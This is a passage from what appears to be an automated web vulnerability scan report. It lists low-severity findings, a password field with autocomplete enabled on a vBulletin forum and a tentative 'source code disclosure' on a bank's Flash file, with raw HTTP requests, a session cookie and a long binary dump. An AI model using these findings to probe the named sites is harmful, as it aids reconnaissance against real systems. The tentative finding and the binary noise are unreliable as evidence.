Set-Cookie: bblastvisit=1304429734; expires=Wed, 02 May 2012 13:35:34 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Wed, 02 May 2012 13:35:34 GMT; path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 25169

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<met
...[SNIP]...
<!-- login form -->
       <form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
       <script type="text/javascript" src="clientscript/vbulletin_md5.js?v=383">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

17.35. http://www.yestheyrefake.net/vb/showthread.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.yestheyrefake.net
Path:   /vb/showthread.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /vb/showthread.php HTTP/1.1
Host: www.yestheyrefake.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:35:33 GMT
Server: Apache
Cache-Control: private
Pragma: private
X-Powered-By: PHP/4.4.9
X-UA-Compatible: IE=7
Set-Cookie: bblastvisit=1304429733; expires=Wed, 02 May 2012 13:35:33 GMT; path=/
Set-Cookie: bblastactivity=0; expires=Wed, 02 May 2012 13:35:33 GMT; path=/
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 25163

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en">
<head>
<met
...[SNIP]...
<!-- login form -->
       <form action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
       <script type="text/javascript" src="clientscript/vbulletin_md5.js?v=383">
...[SNIP]...
<td><input type="password" class="bginput" style="font-size: 11px" name="vb_login_password" id="navbar_password" size="10" tabindex="102" /></td>
...[SNIP]...

18. Source code disclosure  previous  next
There are 9 instances of this issue:

Issue background

Server-side source code may contain sensitive information which can help an attacker formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. You should review the cause of the code disclosure and prevent it from happening.


18.1. http://www.ktb.co.th/flash/a2.swf  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.ktb.co.th
Path:   /flash/a2.swf

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /flash/a2.swf HTTP/1.1
Host: www.ktb.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/flash_eng/ktbslide_index.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _cbclose=1; _cbclose6897=1; _uid6897=F468DC21.1; _ctout6897=1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:45:10 GMT
Content-length: 49454
Content-type: text/plain
Last-modified: Mon, 23 Aug 2010 09:06:18 GMT
Etag: "c12e-4c723a0a"
Accept-ranges: bytes

CWS    ....x...eP\a.688.......=....C.2.>..\..ww.A..@ .............|.o........?..N......O.9W_.    .`.~...z............(....-....... ........d...$...6.X.....%.<.3...0..-.......LMIU    .......#
.........&.%$z.
...[SNIP]...
"M.=5..6..5V,..".X3.V).p.....UEQ...g(..V........... ...^..j
.n.H..>MbE2*.8......~..BW..).'_.I...o.....o........0.Q.....D.&.z.W.,..~F'N/.'e.@..,.5..W(,.I`.)...9..0...~.f....A...>...q-..z..e.+.@..Gz.}?X<%...vt...4<..B    .1"&.7y.R.......8$0}....l.....QL.z.....I....Y)'F..v{...3.....}.J.j.b.H...x:?+Z.IT6H.tNeb..j..K.n.b......m.F.*..v.CY0S{......ZkAd.x..H.-eE.A....s..:q............3..f.Z.....$..H2..n.)...#..>.Z.y....R........0..".-&...V...iE^]......M5Kf;|r....%m.in.....'T.......E4.s...}qD....J.    .W*..PC.yo......G;..l....7+M..D./.ca..<.3..v>.ix.8\...A......wr.m.g.X;&Ou,....n.i.w..+........5s;..@........X8..-.<C...Tt.J..3.......L{d6.._Z.}.fQ....<..O.]...2U\..O..nw...LZ).I..l. .p..........9>.F....iF.$..I9cX..\.....y`........0..=C..pW.v.....`E08.._f......K..:0....;F..;...D.d<.X.6jz.T.l.rD..(e.|Ojmy.Z...~....x..V.,NC}...l..(@...b%..M..
.......L....K.R.............X.t...7gj*!...V...oP....B.c..............ge....N.$U..hm4../:....5...h.:C.U.6I...ud.L..VV....R.L]....<..b..'.(j..'...-<+Y...u........J.~Tb.......|...U=.+....z.&.6.A...J....%....>.s.2^e....ux......"...{.....L.{.....e.%;.k.......|.a..m..].>N.....D<...a.x.....3...vw:.....C.%r.~ . ......S8Y....V.....7...f: u.~.>.....e.{*%jD0.\....=....9@..C..$u.ps~.J.....$#5Lm.....h...8...... .2U..e..j..\..U.;Q.\=...1..<.V..<..^j0os...1.*......../B../..._4D.....z6;...6.8..R.+6....YL>.q.G.Q!....Mh.PI...X;....ig\8..t4...-...Wj...H0...h.a<|..a...1....Wv.[1.>S.6B...2.^h..5.....t.j.M&.9....4.r!&...WY.C..V..L.=.{.R%A.
.c...q..~.~...\.....X.TeS...W..7.n..\..<A6..6+.........(.d@...vf...9..+m$.......}.h.......D. :.u]....HV....L.~(.N...L H=.q...,...x....\zYhw...SXa"......S.b..#.|..e.X....H?.....-...6.......LL|......n..Y.Z*;..eT.o..2...2......^..9..P..K."p..{..^..{...7..f..............a....zp..:.snt......Z...Q...m.v..d.Z]....+......B..bn.U.1.....|.....f...k,....X3.m........w..@..7..3.....T....... ?......K.k.....$.c...[.....dy.# ..m.......BB.n)k>h..d,S....c....i....[.#........|......1...m_\.87.C..0........#.e.....i.Rfe.8'fF.....V..xB..1R.(.|o..B.w...b.eKG...t....c.....l.[./.Mz.m.b_#*..v8.+....a...N.6............o.5p."QlN[.U....."....H..O...S...._../...~..c..F...[..69!...w.........s>..H.0...(....Y*...s.zQ..?O.)eM.p....4L.iA|~uY.tbSI.b;.....og.gp....4:::.....D0..........E.?.2...<...<........Y.../}...........G.......q...`    <.Z..;..v....V...Q.p.K....vD.....g    .r.F...M.....w...<.2....;s.K.o. .`..?.. .......P.}.wV..q..    ....V.!.Y)p!Q..yV...)T_.5v.G+.lb!...Tt...f_._.<o(....q..i...W.Wk.{Irl.#e......bM21..k?J.....d.v..&......$;9..fn?.....ss.O...    #U.<...^.{...
.4.<....Z......x'.@..?.M}..d....R..BVr...s._....j....cB...[}..`.4............c.......n
...=..E.Ml..[3c.5ko....L.7.l4.$_.f..L...e..z.....L.~....%.8.........XX    .R..*._IrqO7S..!;.2..t.$Ki._A.7..^.4...|a..>X.v..B_.+..).H.......|....1.    ....X.LM.\_..9.?IQ@;XL...].P.Q.V.Vc..    .\......-mQr......+H]ok.]./y.U..fQj._........s!.b.i2u.|..3d_.....3%.KH    ;.T._.v].[...,;...7zZ..G..g...c.+W.eG2{.#.:^.P...........#%
_e.....Z[....!.Z.i.9.....WyeKd.n..7M.>..9.3../
..a..7.].z.HR...(t..*U.e........jE...T..a.......l........;.....Q.^..C.....l[.V.|....).....L..M.P.~.........R.?.u$eH.g..@.n..f..?(....9.....{q...Xm...C..`GBK...H....M...........E...b=..?....I.\.8..9.:mP.....3O4f.....h.H".J*q.%..&.a'2+.U    .....$.\..G..#.0........Y7..iE.....f....\.....B...r....O..l{......rV.
..........,..h...T.b]...HbY.....6..~W=....>......\...U...8.p..S.@x.qQjWDN.v.6.L..^..\..h......51{..?Q.3.:..= ...s..V.C.f..`..;....4.e...<;...O    ......s...7K....v..Q.J....R...}...Z|9...../.=.......@...3.r6......F}g..O.iA.7.&..W5......!...{......3...f.f..E*...2.?.}Z.w..(.4.6>2-..<.G..'.../X.....[vo...^.O........Vo...|...%.-....P..R...:.
...=.I.Ws    J.-.R&.L........(3j(..1{../..u
l...pJ.<......y..}:).............!..rf..f.tjg.?...}.
..+..D.Mj....y....rk....5.9....M&.6.."......j.g...j8&9....}.3...WeP.B.{2.}%XU.n..m4n|ue.A.{..'3...k......B:m.....E.]qE......OMV.2_p...L...&..U_K...zb..L.N....T.PC......].X5as..-\..U.z,.Y.<#....&jLn..C.~q#?......F^.q?............t.W.&G.......+$.s...~...6...&fX.5.`.d;P..D..^J..[`..j2..S......G.....[....Z......"....i...>.l....K......Tc.op~,..k.....?6....P..1"..Z.3*&L1......>..t...o..Q.+.Q..p....).S......L.E.s.J3.8f..O.flw..odk1..^2M@E9=.s.Ku..Tn.s.(F......g....&J.........).n...    .@>    .`.'_.cd..ts..9....z.9...F.4)*...wm'..j]c...D..c.    ....\.!..
Uf.]...9?..j....s..Y..CS.y'......1.z}...J\u.>....nU...YZ..    .............Y.{...uSI.X.....s.t^......4(.K........L.hJ:.C.cv3.N&,>f{ ...1....`..3A.......}..v5./    ...tW....]....p...O.6....A.Y.:..K}....:cX....R..u...xCY..KuN~..(...Z.6.Y\.t\6.....:..Q.....=..    9.a.9.V......57yd....A..r>.........}.-.
$_-.................6...G.    ....X.^.........eS..%...`..".aR2B.."..0).....x..=...F...$..:C....P..}6.9.~.....].f..V.s.N..uX..wK;................u...".S...O:.....,0.....(j.9..v..i...xl.....~d.|Q{....c}...4V......M.........:K.YD._I..*.4...}'....v;:~.<.F.q{y......mOt.KF....*n.R*w..I.$..A.....:.?`=..PQ..[+...n...t...5XN.:.4.*...?%........).....pU....h..pC....R.|..3..!.a|.\..L3....C+..|%..]...&........>.8M.O5...K0.Y...kS..@&U.......].....&VB....J..mt....Uq..p....\.\..oc.........RG..0.n..:..A....p?.Fk.[-..%.$...P....h.....*..W.......I    J..*.~......1.0.`n...~.....{..>...\%.4.L.f%..{y.=b)....%...P...........?=`Z..%..........v....@..|U{
..s@...+-..E...5)4..Ic.O.U.j]...........|......i..}yf.Z..Z.....CN.0^ ...>$..A........    .h#...V.x.x....z.I|...}Qv..AX.\MZ.M.).
....H..#.p..(.5..~.jV..*B....cb.....H0e..51*>..\B..L..RGR...%...u..B    uRO..}V..!M..{....:.h..V..K.#mdu....eZ..)1...t..W:......<O.`.@H...[...[2.F......`..4.R.V.AuM..w.\#.#_U....*....-/.ZO."Y.L.N...R.a5..5....NkR.......^.9..=..6">.<..N..u2    u.[...y.....ku......'..A...........w..I.yJ..x...t ...e.(.m...d...?.g.r..<...pG...kf..& .....}G5......'..X.q.GN.'y..#a.;@..-v...:F.....O."...D.Z...1.....2t$..
...t....+.H.F.2..a...*.....9...;...Z................_._:#.......8..4.M.].^k!2>?%........{N.4.....i'T.N.)..G7O    .%BO!...j..=...`o...t.s....BO.......@...s....F.>[+.3..z,......w\u..#.D.$!.......F..Q...f....j..<..UA.^y....F.O.As\d...?.Rz    ..U...:...W.Q.... .7......=.dN.z..GS..h.....5..QY.7...U...u&G.XI.j 3.A<.Z. .....^..r........i..t.UA!....".D.)P|F...}.".B..H.L8..X...&..>!.n...G.hD...p..S.....r.........>^....ajj...JmZ._...d.=.(<........v....;..^kp....'...*...c7..e...t...d...s.....D....9..9.....7p..h....>......N.....nh.....Y).q#..Y...T.n.<.YI..$.A>..Ja..eP..U...B#.Y.x.Y@...=t..R..h,.....W.......d......R.:.m*.I."u..#...Z..-.T.$I,..:-..{.}..b.M.P.5.[3.I-..R.8].A...9h......l.j;C$..n.t.l..#\.v&.N.A.d.EG4..U0..F].y.+..7.P4N....+o.."gC.HQ.@`w@...uvB...@.....g.s.....G:[.....!......P.sA....'..EYQ.&A....a....Q....Y'..:..B..)}..q.....'..X5.....%....w..az7..[p........"..U.P...ps...z...>...KWU...!.}WF.7..W.....-..s.[..&my....v...o...}..;..g.]-.eh.. ..`..e!.......&d.T..9.......^..G...L...Q..2r....`..Y.uj..{...4*....*....R.K*S.....B..}1...i.....[XEf...........&..jT.........GG6A..^y..a..R.../p..B.....:.*aT..gH.3g?...i....M.\.=..|>
/......a.[....O..]..h......j#q.pV..:...4..@D.."..\....    ..Z....Z[ s.}...    }.....gg..y.F.q.i..%'oz.\.V3.2...YP4...p.3.P:-v.+..&t..`..Zdsk.'.t.X..........)W.P.j5.....e.....k.....\.,... ..}...0u..`y!...|?U...s.....u..l.hu'.#....zy.K.*[......P?..    .0.........:7k\t... ..k.........]S....h.......Vi.......^..6h..u..].\....8;...+.Y..#.N.%.....y..a.F........kA....y.;...D.CXv.....j...=....DL..{\B..k[....W;....,E...T2..P...i.X..t./.h.@._<{.......`.Z......J............_....//.1.NKJ........f.....T}Z..6....Vc.<I\...xu|?j.Q.XhK......OE9F.?G.....mj6..&...z~r.......7+..m.y.....n......0%.....buK..[.kd{.?....F.1P.0A.V..k6...i>..2......-,..;......O.m K..........-l..h..v.\.."d...U......1....D|.eN...*>....Gf.wd..}...f..0.5..@.{v..P:8{..YZ........0h].....<.....b...h..N..Z........cs.....|...j..h...[.j../:.z.Wa.y@..?#...W........m...-ln...eB.C..8.K.
...z.....X....w...}+{.z.......Ss\$..A..x......V....U.......u....v...e.Kw.....O..$..j\YW.......@.".....K.m:5... 5.....R....s..n+ni...I..c.T..~..zh..[...._..t:.S.....0?iXu.X.... Hp..K......;...=.'...e.U.}.#C..n..+.$C..6.tY.....'DR-..}*5XZ.....)~(......4.Yo^.ri........kt.8h.....G...j....K.k..[......,h......kT..J..FM.,},.......Tw7.{.:u..eM..F8T,a`...Dg..@;....+...shTmF...5..)...71.c+...B.....:.{..%...5..Y5.C(...@..9(<K...p.m.lm..u...]..L.....-.p.YZ..I]:.9e..s7.{..{.....U.EZ.c.Ot...y.J.....(.....7e...0.>.....9/+.U.U..{UE...:w.c%U.P_.x.\z*.......O4....9.-q.OD...w0.L.F.Eer2.4.'.(..Y$.....>.......6......o.x..i......$..i..U...z..+..    ay9C......:..`...-.L.l|.....2..:......c...[s[X..`.......f......._....    ....TA...o..P..X..n0..\..u@u.U....}'...q..A}_..u..,..X-.R.l...x.x..d..J.s..w.:...f....2......{*.k.%..Y&|....V._.\...9Z.\7...x...L..k.t.h..b.WW.>.o.....e.......n.{...~p.]...3.;....H$..?(.#..anQ.sE1.........a....h.k...x.....#.vP.6..5.A.=V*.E7.w... jD.....X.&..@.Z5?.....(.YkV..A...zN.+.co.Yg^.......~C..8.....n..........!..kpa....>..#.......v...O0.4..'........g[;..F.C.G.Zr..0ecH....feI,2g.i..ev....9K.....[....ztZ....#6....^..._.e..8A....[*..;k.w;..p'x...\w..j....Yv.    ..mP....%.uh....4.S...!....>#.@...>.j7p`...e.KZ...8w.........C..xx...$........4.V.W....j.>.7.<.....)u<:..j.-y. T.j:.....x>......    ...Z..s.'v.O....[>......e....V.i..~..6.."..G..*..v$||..^5.h7..........:`..?0. .x.j..=..8.h..yo'...?I.>...Zd....^..Dy.j..]`.I..\.h..|U..w..@ ..........5.
...&..Tn....H.3.<......X..8....i9...h?....Y.&h`.R>....&H.e.
.:........@?=.A..+5ptr......"..X+OC.8m.9*...2\|.....y#._4...c....E.qC.p....h=usWCY.7s...q=R.+...E......Z'-..............n..\.......z.....I    .NL... 4/;..t{L2...J.x........D.<..]......V.WK.l/.....;i..8.8F.Z.c..2. {....zM...~K.`.si.H.[.--i.d....PlPf.......Rc.K......y.-...I...![sT.....3.....Ik]..a...V*..+z.!.......R...z,p....%.}u....3R.C...T].-.a.]....r]......v.w...Wq}s.e..U..%o....$9.K....^........0........X......-...IY.g..r.x~k....Iw]r.V.d....c.....>"['.m.k..._..V.l.[.@#.u..]Ph....?.Q.!..v........4.Gy..H.[.......f;.*.....e..I&e...K_^.^]..i.PW9{P.?9.h9.S0VQ+^.`k.n.....Y..v.`.G.m*~M...d..k.:..
...7...+.<..[YZ....L.@%t.9.9K..o!....i.k.......x....q.s[...,1...W4.I{.....H..6.....k...$....X...-=.:..= |Qf7.;.p...".qjh........q4*.)eHW......J.#.4.>+K.iUs."r........0.........._%.\J.o,.p.7R.Hkt....
...+VI..w.A2.k......c.x........\.b>..L.g.2...yo.Y.n$...x..o...D.......8.Q.......M{A..mP......v...T%..F.f...G9$......._.O....g.:.-........s..X\..G4...-.v.~...[.....%3.0CjQ0..Lr9.s..<.`x.;..mR`.....@.....nmF...^....).<5. .@6..i&gpf.m..jH;.4.......#_%.......`.-G..=.... ..'E$.9.TK...4.....f......@.Q<....ogT.....".C.....~......dGV..|.oY.+8.`H .@+..=..@I....7...i..}......+..c.....m.....=..|...........9..[...<...,.......:x.\>...Yw.p>2$....iS ...q.p.$...3....I..t,.N.\...A._VPog.OE.......x.....,..+..;.5....E.|.+.g08...........1...V..z.:.|.ZI...N...:...uu^..f.;[.....p...p 69    ^.V.u..~.{\.<..?..e...n    .].U..O3.Px...G..<[...,4f....='....[v\...F.v.E..A..L........V.k....*e$..fA.U.}.."\i..A.p....7....G#...........qZL..e..]...5+4u.u..g....Q.b....4..Y...t...|l...?z...P\S...f..?..s....V.)....n.\..*j.}.3+q.7.\Z..miU.`pe'..Pz6a|Km..m.d*.m........x........F.C....>...,?..Q.m.;j/vr.B.=Cy,...84;Q......7...7./.........5..i.2(...S..}.
..F35..E.@dEF..R.......!...Z.:s^y...%.3.+N..H-$.5..A...[B...l.....wC.W&.....G=...}.2.2.xj..,Y.    #..X../h....h....nZq...36a F`B..u.3..K.owH..c...Z..>.....;0..e.o............Y{J....g..yV.^..pO..{G...`?...V..1oe..5..8.qKfQ.x.~..S..Q..X..c.......eqtYQ.{H.6..w....m..G..........{..I.U;.|.u..w...p..C..qt...s...cb.../V.{F....Z[ ..-:76.9.>....V..%.....r.m..."....m..1G
.h.V..J.{.4.Z.....`8.+........l.k4X....-.    .J.C..H..S>.8.....W.b..&.Jd\S9.?u...6.
......-.o...T.Y....F\.-...%...[...O..mL.<...|.v.t.*.hei..i...N...n..<...s...pH..v.{.z..q0    ....J..=..XZ.#...1...(..R4...t:......q>.....?..I.]L......`.4j......
.9-.&..w......M....y.4t..%D}I.tr.Vwt.W.%....f..........p...Xs8.vS............p.4.fI+.....z.....Y\..._Tk..{[...`N...+......s;&w.. ....OS.[6./eg;.r..K?.......j...T..e.1.....].X.....Q.......t..2..H>.-.:.-..h.]Y.c>.............mI..4k&~*A."..j.^V..;.H.t..M..9B..m.}..............m..Z5X)e.Iq..v..H>k..u.@...6..,%d....5.....    ..T..........e....4....e.=.A.2.........."....}G.R./q.IW......O.%..t...~.......x.@..B......+o.....V....#..kv=..S
..u3.    ..8.^Gf.}.B..Z..c:uA.).N......G8...m.5s.@ l..8-.K.].X5%.......kU.mREJltuh..)3n..\.|..T4@.@..<.;.j...Vs...f>...Wp.6..GW...R>.u...c....9..]......p,\.2....@.....I..+....6.....0.........1.V........Q......g. .......{g..Q.0=.....4.sr.B..v...=aEs...f.....7.[.q..l.....U.^..I.X........9..>iA:.0.G..;k....B3A>+5K...q......2........    ..X....6.....n.i..: .m.'}.yL}S.M.....9.,n.Gv.`'bXH.*.\......KF....J....6w.........7.2..q.I..4.)..Is.i.z-.n!.s.mQ.....H....    .d..G.P..*ogq.q....V...<.....A..    .q...U...k"~.@]...3..W..4.dm...(7\I....%3..P x..m.r..$.J.W...>. ..@6.$|U.0[.....+.r    ...........2.`.4..|...=.....c.3.@....b7.X,.!......./.[G(.=.)8.5.]}..N.7Y.u..ev.X.0X......*.#..e..VS.V..~...{.V........f..==.....l*..vB.x.b>k.o..g............n.,3..r..L...t..4...?....t. .......p...4...u.~-..u..}.....w.....v..v...cj3+.....j.Z....R...AU..&I..e.lk..L.ZI...+.kV.R..H?...%..o....;.(,N.}A..c_.W)V6..._3*...e.{mokV..{.N.*m..%.I.+."..&...d{.Y>R......1....u...y..3..G    .a..z..-..A.y.../.....q.....".....Gh...%bk..w.I0....D8.c.s:#.jm....k....Ev.. ....-s".i..V.X.$..5.$....++......#R.1.F.C.x......f......W...<.ai...(=.}f.....J.z.O.tQi"A..]N..j.F_..].............r.|.F.V7n$..wX6...J......W.>...0'l....A{.&en..c...d.%.1+........-...n..29B.....*..9......)X..:.......h.....}U... e^.....Z......E*w.y.'M.`"...........j.M..Zy@.@@w'    .E3...wj!....@..h......t..)w.@.4..s...j....[...R.l..($..\..2....hs..-0%.\1.)....V.P.g..(\l4WmJ.R9j@++R9N!........../y.<.......H&zo..;.!.....a.M........7v..6.........
.?....m.....Fx1.}...j.]..ou.C......m..)8j.:..
.......!.........Q..cKa.......Cy.^...{]&F..5#..&.2.H...+. .W-.....f..N..R^K..d...=.[_.a&N..i.5.in..csA...z-Z.:......k.R..*f.'N_T......a.`Cv.bG..\jQ ..I..v..[U."4......W......0-'.xB;....a.=..OY^3._
m.5B.....s...Jp..B#...j....
.s9.6.'OU....e...A..h...~asv..o.j....O...6.2...}'.BWm.Z.T;[...:g..'.\.Z...v.[j.W=...>...u....j.....#....}.W...O
.,..0.G....G..p...@CG@...M9.'......;.i..V..e...mJG.........x.R.V.....U.[.u..L.,.Q...~.0S....[a...eLB.{...|.V......`U..Wly..j....n#.+G..... -9..sV......c.JNb...M.TTi<....G..1..#g..P.N2.F........1..l..3NQ..H..@.ysN....c.p.(..}3..4....GUk.$y....f[..s.i..7
.....D.UmY..'.j...nh.lF.....p.y~.$i>..H`.-.%.5s..l.h..H.^.C.Rv.,oA....;:d..[.s*r..k.y.Mgy
...5........<.T...d..bgM..%....%.j.K.0.F.G.Q.j..X....d.H?...P.G.rC...~/..N#...{P[....P#.Zd...N.t..T.=...L{I.Q.]OP%q........O..R..1c......m-`.nV.+.....Os.....QD.....f..W.9..K..W........Q..}...iU..I.75fH....q|~.3.CZ.Td.A.<.......i].Dw*..R...N..uA.3.S1.x.c.^.o.l7.8..=..Z......j...jn..h..B..........y.j........P....Z..j5..s.a9z..;..."..0.7AqS...X3}].Y....22..*...G
.i........,(0....n..?..V..=...h..v...B.."..M....2...P.A_........m.F8O..'%..S.....[OW...]H.......t.YguJ..h5.....}..S.B..=...y..[I.&    ..c.E....8....)...h...f.3..<....~!p..|:.O:....:....`T..S..Z.GsQ..3>*Q...6......3..O_.1.c...........m..l..U|..A+...YJ...,cZ......k`..CH.B....p'....E.F..<.>....2.bgO.X*8;S.....P5:......h:...%..........~.D......'d.f/h...Q.)....F.bu..O..a}.#}u..*...i.#..o..9N..'.......U;Pw...>..g`.:...^...d.....Z..nkQ..........<...0........    <.Z....z...s.2.h:..&X'=C..:..l. G(.m.+.di.O...(4.W8..VaT4w...N........T..`.!To6.....B.s...J.{..'7...(.....6.s.{m.,u).G{N.ac.Di..U.!....M.....`.U..F.o.V.........-:.b    Wq...5n..$.e.]'e..^.U.w.AM.......[+..ga>+_.v.?..]...."%.gP...+...#pd.....'_..5.2I."5.S-..l.=.)..6R@.{.^..X.#P&aM.#@....V.RA.:.1L.$....i&50...(Qq.8.z...I..d...@.sOtG%Cn.....a..o..A._...q.P....M..'(%K............5'n..9..;`....F.%...'..!=..0....<.Y...V...x..T.\..k..-....h3.V7aX.2M....v ..We.H:...0....7.^.tSa.:.(..&T..^>+.[..1.Z..$....v..h:..uVd{dN.. ...).F.Pv...{3........6.g.."t........t.u....[.p.)St.2....m.%N...lA.;.y-......l@..j.U....?.Zy.Zu..P...........z..4..Nf..|..n,.....f.'pd...7ThU.....4.....'...|H.eJM.Hw.y..u....R....}.xB....w6v..~...'..6.Mf....<.k..V}\.ri..g..-...EO.]...Y^..vl.g......4...Vz.A....Q...X.{8.1;.............H.;c.........    .D.z..s.Um&.........M...w..].:..b..sH8hCs.O...c.i.mkb.).a.4..i...HT......:..V...M.-.k..... .nr1..:z../..U..G<.8.?.....j.'.Aw!...x.#+..@.....:.g..Q..f]T0.j....@..u..]1K......T...N]E....O.......ui.#v..t.$.}......]._t..L..F.._%.........e.....H".C.. .XN.J...x.........I .t.kz.@G.7..#..vT..a.Q/...\`...s).N.:fR.....:...5Z..@.d..>S..Q.0...1..DA&t..P..$........JV.p..jCw.R.wF. r0zo.+xB...]h7e.7.8..........|=O......T..Z6..OW...tT..1......~2`..G..0..2...a2...../h...e..%.u...#z.X.f.......Y)H.1..c.P.\..N...$..F.i......vl......p..&..EwM.EW.C..*.s.k...r..GI..k..H......^.P.#...]..*e......~K[.$.jVkK..}.i.T....%1.hVd..;..z..y.9`....`...:.5....R.J.{Z.;Jy......+..q*u.Iev0..R.-?..^.........    .>2.^....4..T...el9..g.._!...R.v..VN.5.H.M...$..'q...x.S....;.Y\;3*.....kf.,.V..t.r.....-..5j..I.#)............c...\...e@g -:......j...^kZ......9.$y..Z*[...Kg.....H%.V....D..Em.6.Go...<eG..Agh.a.p#M........9..h....(1^[..N$....O....m6....Wd..........z.p..V.1;...8..+p./J..4*..Y.......i.._.7m\~^c..P...R....F.....>.5.c....r...-[...}g.T..FN...=.........6..c.....}.|.
....q&$...Y.W#..V........h.xv.C..sR....;.....S+.....U.....k.+.c...eF.v......!..'..r.e~]........"...SSO.......Pz.....e.u.?.>.y......?.p.Oo..z-Zx..q&0ZM:7......R|..i.Z.5...=.......=a..t.v/m!F.. ........O...nh...7...j.*._..pm....Y....,eWg/._t.....:na..1....].%wa..........a...w1...5.X...0........Z^4.....U...R{Jq.......%..#..........q.|...K.."...J...4.[4..H..Z#Gj..k.5..p...]..!...~g..J.aPi..u......mN...@..V9...xw.?X[.y.lD ......    ..pe6.yd....f..*..7h.u......u1.u...y.j.z..p.sg....43Z..~.W0.v..Es...m....
.c_..,....L..k..f....Q.E..cs ..$....a..Hf.R.....q.A...<..!.....g..)S..2....U..Xp..j.p.Z.8.....z....+30...j...O..'...C..e:!.....H.{...#.p.t+..m..u.WV4..6.....hXQf@..I.+.....:..q......!F.Jle ).h.1.5.:...u;.W.......k.... ..V.L..BJ..-.NGIS.e^mK......np.-.R....%.....l..j..v.88...!twe...z......2].....x..L9.....j.....u...@.y..Rl....X.......Qp#F..O.....64..]:-.u...;Ti......].>.v<5e.L...u........@.Z}.0d8I...V7U0G1....[..d........I$.....j..l...=..+MC..A....A.....1<..T..i...>.}..q;.bt>S.........6i.:..9.UG.f#X..Z..d.N..|...+oE..*..I....F.u..yvnh.=.#U..^..O..%...<...1>$.l..h[R....$D..~....x.'m............._..tK^.gt*......|...P..=.yV.......jd...t....N%..krWk...'.....@..g.
..!..z@Ql...-sL..e.C..B.~...SQ....*g..#]..._1..A:.*..N...p.}. KL.?4....1...R...H..\....u....y..:.......&u.-..#...u..d.O=...^h6........A.E......U.....y....9:..tW.!..5.*jD..%\......$.a..>.%P..........W<..|...m4..3../.4..+H<H.:.......sM.fr...f.....6Z.v.u...4k.Ubl.......J....X.. L..B.&4..U...u.`+f..u.X.G.~.En..c.Q..<.2..i.;.w..S.X.@......yB..#...@...f.:\@.TP...2..t..S.A..............W..gU.i...M.<U....e..:....M..TwA;D|.1J.q..)...n.]...:.<...4.YSa....e..:...w.i.6.....jX....V9.O ~).......h...
....4..R.....Lz~..j ..A...*..gT....;...I..#.......C.{zD...h.}7....(......Z.k..".[1.,|.....i2...3.
um......yL....-/C.Z.P.....^}...#e.:.3....`..n...:........A...d}.*mkk..>..;..V.P..~[.Nc.;...amVT1$t$.....u....0..1..t.r....g....Ty{.;......f...2..4.N.`u'...Ca.Z..*.C.l.......h...i.......F.D9...p.F.b.....@..<...+..uz.......... ......\...~`..ZX[...h[.9@..[I.$.....yw.n<6.?V..L....]...&V.G.....v...ZcV>7.'.Fm.....t<.\.51...0_<.. .:............J.hN.|?.F^1.t.<...c....C..9.$.....{@'S;@0.....CFh.t...e.K.......6..B.$.....=.....I;i.j./dbx~../..|..z...j...t+0[...U..P...3.s.P.Zh.y....U$.-...ij.X.c.... ..fc.+....8..uWV..R....m.r...P.=?.\..AW...D.l.....e...L.....V .0A.....KD.A\..M.Z....sH...E.......5ZNV...S6..........%Y.xF.h....T..........Lm.B....._M..\P..%`.......Bc.......*.!.Y#.I..u.q..../%....&u....~.....*^...'...........}..+.4U.Q.A....&G.....1.s.....#0..8.t..pR-a.    n...P..|J.........t.Rt.:f....N@............:2.....Zp....W......9.2..\L+E....{Z.:.5A-M..0.h#.\.L.@q..R..
..6..2...b.;.D?3.n`...F....09r.V..5.:.fw..ab7.a-x....s'.JT...
-4...........u..X\.Hb5i2....$N.....%.s.X..eL..!..M    ..I..]..........k..JR.Z.7,4.^f....=6z.:.Ym...o._.R.F."..9...#..I.O.-[. ......^.(b6...k......`..J.....?U......^.<..0.v..    /..gSeO~..L......*....R....+..}....0.b.e[VU-.........&...!H.\...
